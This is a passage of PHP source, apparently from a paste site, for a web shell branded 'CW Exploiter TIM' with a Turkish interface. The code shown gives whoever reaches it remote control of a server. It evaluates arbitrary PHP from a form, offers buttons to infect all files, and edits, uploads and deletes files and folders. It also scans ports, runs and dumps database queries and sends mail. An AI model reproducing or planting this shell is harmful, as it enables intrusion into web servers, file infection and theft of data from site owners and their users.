  1150. <?  echo "$contentz"; ?>
  1151.  
  1152. --PHP-alt-<?php echo $random_hash; ?>--
  1153.  
  1154. <?
  1155.  
  1156. $message = ob_get_clean();
  1157.  
  1158.  
  1159.  
  1160. $mail = @mail( $to, $subject, $message, $headers );
  1161.  
  1162.  
  1163.  
  1164. if($mail) { echo "<br><td valign=top>
  1165.  
  1166. <center><font color='green' size='1'>Mail Sent</font></center></table>"; }
  1167.  
  1168. else { echo "<br><td valign=top>
  1169.  
  1170. <center><font color='red' size='1'>Error</font></center></table>"; }
  1171.  
  1172. }
  1173.  
  1174.  
  1175.  
  1176. elseif(isset($_POST['encoder'])) {
  1177.  
  1178. //Encoder
  1179.  
  1180. echo "<form method='post' action=''><td valign=top>
  1181.  
  1182. <center><font face='Verdana' size='1'>Text:</font><br><textarea name='encod'></textarea><br><input type='submit' value='Encode' name='encode'></form></table>";
  1183.  
  1184. }
  1185.  
  1186. if(isset($_POST['encode'])) { echo "<td valign=top>
  1187.  
  1188. <center><font face='Verdana' size='1'>
  1189.  
  1190. MD5:   &nbsp;&nbsp;&nbsp;&nbsp;<input type='text' size='35' value='".md5($_POST['encod'])."'><br>
  1191.  
  1192. Sha1:  &nbsp;&nbsp;&nbsp;<input type='text' size='35' value='".sha1($_POST['encod'])."'><br>
  1193.  
  1194. Crc32: &nbsp;&nbsp;&nbsp;<input type='text' size='34' value='".crc32($_POST['encod'])."'><br><br>
  1195.  
  1196. Base64 Encode: <input type='text' size='35' value='".base64_encode($_POST['encod'])."'><br>
  1197.  
  1198. Base64 Decode: <input type='text' size='36' value='".base64_decode($_POST['encod'])."'></table>";}
  1199.  
  1200.  
  1201.  
  1202. //File List
  1203.  
  1204. echo "</table><table width=100%><tr><td>
  1205.  
  1206. <center><font size='1' face='Verdana'>Toplam Dosyalar: $fileq [$filew files and $pahtw directory] </font></center></td></tr></table>
  1207.  
  1208. <center><table class=menuz width=100% cellspacing=0 cellpadding=0 border=0>
  1209.  
  1210. <font size='1'>
  1211.  
  1212. <td valign=top><font face='Verdana' size='2'><b>Dosya Adý :</b></font></td><td valign=top><font face='Verdana' size='2'><b>Tip:</b></font></td><td valign=top width=15%><font face='Verdana' size=2><b>Boyut:</b></font></td><td valign=top width=10%><font face='Verdana' size='2'><b>Perms:</b></font></td>$listf</font>
  1213.  
  1214. </table></center>";
  1215.  
  1216.  
  1217.  
  1218. echo "
  1219.  
  1220. <br>
  1221.  
  1222. <table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'><tr><td valign=top>
  1223.  
  1224. <center><b><font size='2' face='Verdana'>Server Uzerinde PHP Kodu :<br></font></b>";
  1225.  
  1226. if(!isset($phpeval))
  1227.  
  1228. {
  1229.  
  1230. echo "
  1231.  
  1232.   <form method='post' action=''>
  1233.  
  1234.   <textarea name=php_eval cols=100 rows=5></textarea><br>
  1235.  
  1236.   <input type='submit' value='Calistir!'>
  1237.  
  1238.   </form>
  1239.  
  1240. ";
  1241.  
  1242. }
  1243.  
  1244.  
  1245.  
  1246. if(isset($phpeval)) {
  1247.  
  1248. echo "
  1249.  
  1250. <form method='post' action=''>
  1251.  
  1252. <textarea name=php_eval cols=100 rows=10>";
  1253.  
  1254. $wr = '"';
  1255.  
  1256.  $eval = @str_replace("<?","",$phpeval);
  1257.  
  1258.  $eval = @str_replace("?>","",$phpeval);
  1259.  
  1260.  @eval($eval);
  1261.  
  1262. echo "</textarea><br><input type='submit' value='Calistir!'></form>";
  1263.  
  1264.  
  1265.  
  1266. }
  1267.  
  1268. echo "<form method='post' action=''><input type='submit' value='Infect All Files!' name='inf3ct'> - <input type='submit' value='Eval Infect Files!' name='evalinfect'><br>";
  1269.  
  1270. if(isset($textzz)) { echo $textzz; }
  1271.  
  1272. if(isset($textz0)) { echo $textz0; }
  1273.  
  1274. echo "</center></form></td></tr><tr><td>
  1275.  
  1276. <center><b><font size='2' face='Verdana'>:: Edit File ::<br></font></b>
  1277.  
  1278. <form method='post' action=''>
  1279.  
  1280. <input type='text' name='editfile' value=".$dir.">
  1281.  
  1282. <input type='submit' value='Go' name='doedit'>
  1283.  
  1284. </form>";
  1285.  
  1286. // Edit Files n3xpl0rer
  1287.  
  1288. if(isset($_POST['doedit']) && $_POST['editfile'] != $dir)
  1289.  
  1290. {
  1291.  
  1292. $file = $_POST['editfile'];
  1293.  
  1294. $content = file_get_contents($file);
  1295.  
  1296. echo "<form action='' method='post'><center>
  1297.  
  1298. <input type='hidden' name='editfile' value='".$file."'>
  1299.  
  1300. <textarea rows=20 cols=80 name='newtext'>".htmlspecialchars($content)."</textarea><br /><input type='submit' name='edit' value='Edit'></form>";
  1301.  
  1302. }
  1303.  
  1304. if(isset($_POST['edit'])) {
  1305.  
  1306. $file = $_POST['editfile'];
  1307.  
  1308. echo  $file."<br />";
  1309.  
  1310. $fh = fopen($file, "w+")or die("<font color=red>Error: cannot open file</font>");
  1311.  
  1312. fwrite($fh, stripslashes($_POST['newtext']))or die("<font color=red>Error: cannot write to file</font>");
  1313.  
  1314. fclose($fh);
  1315.  
  1316. echo "Done.</td></tr>";
  1317.  
  1318. }
  1319.  
  1320. echo "
  1321.  
  1322. </table>
  1323.  
  1324. <table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'>
  1325.  
  1326. <tr>
  1327.  
  1328. <td valign=top>
  1329.  
  1330. <center><b><font size='2' face='Verdana'>Dizin'e Git:<br></font></b>
  1331.  
  1332. <form name='directory' method='post' action=''>
  1333.  
  1334. <input type='text' name='dir' value=$dir>
  1335.  
  1336. <input type='submit' value='Go'>
  1337.  
  1338. </form></td><td>
  1339.  
  1340. <center><b><font size='2' face='Verdana'> Port Tarayýcý <br></font></b>
  1341.  
  1342.   <form name='scanner' method='post'>
  1343.  
  1344.   <input type='text' name='host' value='127.0.0.1' >
  1345.  
  1346.   <select name='protocol'>
  1347.  
  1348.   <option value='tcp'>tcp</option>
  1349.  
  1350.   <option value='udp'>udp</option>
  1351.  
  1352.   </select>
  1353.  
  1354.   <input type='submit' value='Portlarý TARA'>
  1355.  
  1356.   </form>
  1357.  
  1358. ";
  1359.  
  1360. if(isset($host) && isset($proto))
  1361.  
  1362. {
  1363.  
  1364. echo "<font size='2' face='Verdana'>Open Ports:";
  1365.  
  1366.  
  1367.  
  1368. for($current = 0; $current <= 23; $current++)
  1369.  
  1370. {
  1371.  
  1372. $currents = $myports[$current];
  1373.  
  1374.  
  1375.  
  1376. $service = getservbyport($currents, $proto);
  1377.  
  1378.  
  1379.  
  1380.  
  1381.  
  1382. // Try to connect to port
  1383.  
  1384. $result = fsockopen($host, $currents, $errno, $errstr, 1);
  1385.  
  1386.  
  1387.  
  1388. // Show results
  1389.  
  1390. if($result)
  1391.  
  1392. {
  1393.  
  1394. echo "$currents, ";
  1395.  
  1396. }
  1397.  
  1398.  
  1399.  
  1400.  
  1401.  
  1402. }
  1403.  
  1404. }
  1405.  
  1406.  
  1407.  
  1408. echo "</font>
  1409.  
  1410. </td></tr>
  1411.  
  1412.  
  1413.  
  1414. <tr>
  1415.  
  1416. <td valign=top width=50%>
  1417.  
  1418. <center><b><font size='2' face='Verdana'>Dosya Upload<br></font></b>
  1419.  
  1420.   <form method='post' action='' enctype='multipart/form-data'>
  1421.  
  1422.   <input type='hidden' name='dare' value=$dir>
  1423.  
  1424.   <input type='file' name='ffile'>
  1425.  
  1426.   <input type='submit' name='ok' value='Upload!'>
  1427.  
  1428.   </center>  
  1429.  
  1430.   </form>
  1431.  
  1432. </td>
  1433.  
  1434. <td valign=top>
  1435.  
  1436. <center><b><font size='2' face='Verdana'>Dosya Sil<br></font></b>
  1437.  
  1438.   <form method='post' action=''>
  1439.  
  1440.   <input type='text' name='delete' value=$dir > <input type='submit' value='Dosyayý Sil' name='deletfilez'>
  1441.  
  1442.   </center>
  1443.  
  1444.   </form>
  1445.  
  1446. </td></tr>
  1447.  
  1448. <tr>
  1449.  
  1450. <td valign=top>
  1451.  
  1452.  
  1453.  
  1454. <center><b><font size='2' face='Verdana'>Klasör Oluþtur<br></font></b>
  1455.  
  1456.   <form method='post' action=''>
  1457.  
  1458.   <input type='text' name='makedir' value=$dir> <input type='submit' value='Oluþtur'>
  1459.  
  1460.   </center>
  1461.  
  1462.   </form>
  1463.  
  1464. </td>
  1465.  
  1466. <td valign=top>
  1467.  
  1468. <center><b><font size='2' face='Verdana'>Klasör Sil<br></font></b>
  1469.  
  1470.   <form method='post' action=''>
  1471.  
  1472.   <input type='text' name='deletedir' value=$dir> <input type='submit' value='Sil'>
  1473.  
  1474.   </center>
  1475.  
  1476.   </form>
  1477.  
  1478. </td></tr>
  1479.  
  1480. <tr>
  1481.  
  1482. <td valign=top width=50%>
  1483.  
  1484. <center><b><font size='2' face='Verdana'>Dosya Oluþtur:<br></font></b>
  1485.  
  1486.   <form method='post' action=''>
  1487.  
  1488.   <input type='hidden' name='darezz' value=$dir>
  1489.  
  1490.   <font size='1' face='Verdana'>ADI:</font><br>
  1491.  
  1492.   <input type='text' name='names' size='30'><br>
  1493.  
  1494.   <font size='1' face='Verdana'>Kodu:</font><br>
  1495.  
  1496.   <textarea rows='16' cols='30' name='source'></textarea><br>
  1497.  
  1498.   <input type='submit' value='Upload'>
  1499.  
  1500.   </center>
  1501.  
  1502.   </form>
  1503.  
  1504. </td>
  1505.  
  1506. <td valign=top width=50%>
  1507.  
  1508. <center><b><font size='2' face='Verdana'>Database<br></font></b>
  1509.  
  1510.   <form method='post' action=''>
  1511.  
  1512.   <font size='1' face='Verdana'>Username: - Password:</font><br>
  1513.  
  1514.   <input type='text' name='user' size='10'>
  1515.  
  1516.   <input type='text' name='passd' size='10'><br>
  1517.  
  1518.   <font size='1' face='Verdana'>Host:</font><br>
  1519.  
  1520.   <input type='text' name='host' value='localhost'><br>
  1521.  
  1522.   <font size='1' face='Verdana'>DB Name:</font><br>
  1523.  
  1524.   <input type='text' name='db'><br>
  1525.  
  1526.   <font size='1' face='Verdana'>Sorgu:</font><br>
  1527.  
  1528.   <textarea rows='10' cols='30' name='query'></textarea><br>
  1529.  
  1530.   <input type='submit' value='Sorguyu Calistir' name='godb'><br><input type='submit' name='dump' value='Database'yi Dump Et'>
  1531.  
  1532.   </center>
  1533.  
  1534.   </form>
  1535.  
  1536. </td> </tr>
  1537.  
  1538.  
  1539.  
  1540. </table>
  1541.  
  1542. </table>
  1543.  
  1544. <br />
  1545.  
  1546. <table class='menu' cellspacing='0' cellpadding='0' border='0' width='100%'>
  1547.  
  1548. <tr>
  1549.  
  1550. <td valign=top>
  1551.  
  1552. <center><b><font size='1' face='Verdana'>
  1553.  
  1554. CW Exploiter TIM // Cyber Security
  1555.  
  1556. </center></font></td></tr>
  1557.  
  1558. </body>
  1559.  
  1560. </html>";
  1561.  
  1562.  
  1563.  
  1564.  
  1565.  
  1566. ?>
Add Comment
Please, Sign In to add comment